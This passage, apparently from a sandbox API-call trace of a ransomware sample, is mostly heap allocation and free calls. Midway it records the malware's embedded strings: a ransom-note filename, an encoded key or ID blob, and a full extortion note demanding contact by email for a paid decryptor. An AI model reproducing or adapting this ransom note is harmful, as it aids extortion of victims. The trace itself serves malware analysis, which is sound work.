(in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0036.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a88 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108bc8 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x108df8 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cf8 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105500 [0036.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ad0 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105500 | out: hHeap=0xe0000) returned 1 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105a00 [0036.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ad0 | out: hHeap=0xe0000) returned 1 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0036.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.790] SetLastError (dwErrCode=0x0) [0036.791] lstrlenA (lpString="Rabbit4444\nHOW TO BACK YOUR FILES.txt\nNQDPDE\n") returned 45 [0036.791] lstrcpynA (in: lpString1=0x6fd9ed, lpString2="local", iMaxLength=147 | out: lpString1="local") returned="local" [0036.792] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0036.792] lstrlenA (lpString="{{ID}}") returned 6 [0036.792] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0036.792] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0036.793] CloseHandle (hObject=0x0) returned 0 [0036.793] CloseHandle (hObject=0x0) returned 0 [0036.793] GetSystemTime (in: lpSystemTime=0x10125c | out: lpSystemTime=0x10125c*(wYear=0x7e3, wMonth=0x7, wDayOfWeek=0x1, wDay=0x16, wHour=0x6, wMinute=0x1, wSecond=0xf, wMilliseconds=0x1b7)) [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109710 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097a0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108cf0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109830 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108fc0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108d80 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098c0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109170 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109050 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109560 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1093b0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bd0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108e10 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095f0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108b40 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109950 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1090e0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108c60 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ea0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f30 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1099e0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109440 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109200 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109290 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109320 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1082e0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108640 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107d40 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108370 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107dd0 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108880 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109680 | out: hHeap=0xe0000) returned 1 [0036.821] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105ed0 | out: hHeap=0xe0000) returned 1 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1094d0 | out: hHeap=0xe0000) returned 1 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fe8 | out: hHeap=0xe0000) returned 1 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109560 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1098c0 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x105ed0 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105570 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105fe8 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x106448 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x105610 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ab8 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1099e0 [0036.822] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0036.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105728 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1099e0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105460 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103c50 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105460 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x109440 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103c50 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105840 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109440 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105340 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105340 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105360 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105360 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105350 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105350 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053a0 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053a0 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0036.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0036.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105400 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105400 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052a0 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052a0 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055d0 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055d0 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105250 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105250 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105350 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105350 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053c0 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053c0 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105590 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105590 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105500 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105500 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053f0 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053f0 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105380 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105380 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105350 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105350 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105310 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105310 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105250 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105250 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105360 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105360 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0036.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0036.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053d0 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053d0 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105400 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105400 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053d0 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053d0 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105400 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105400 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052a0 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052a0 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105330 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105330 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105300 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105300 | out: 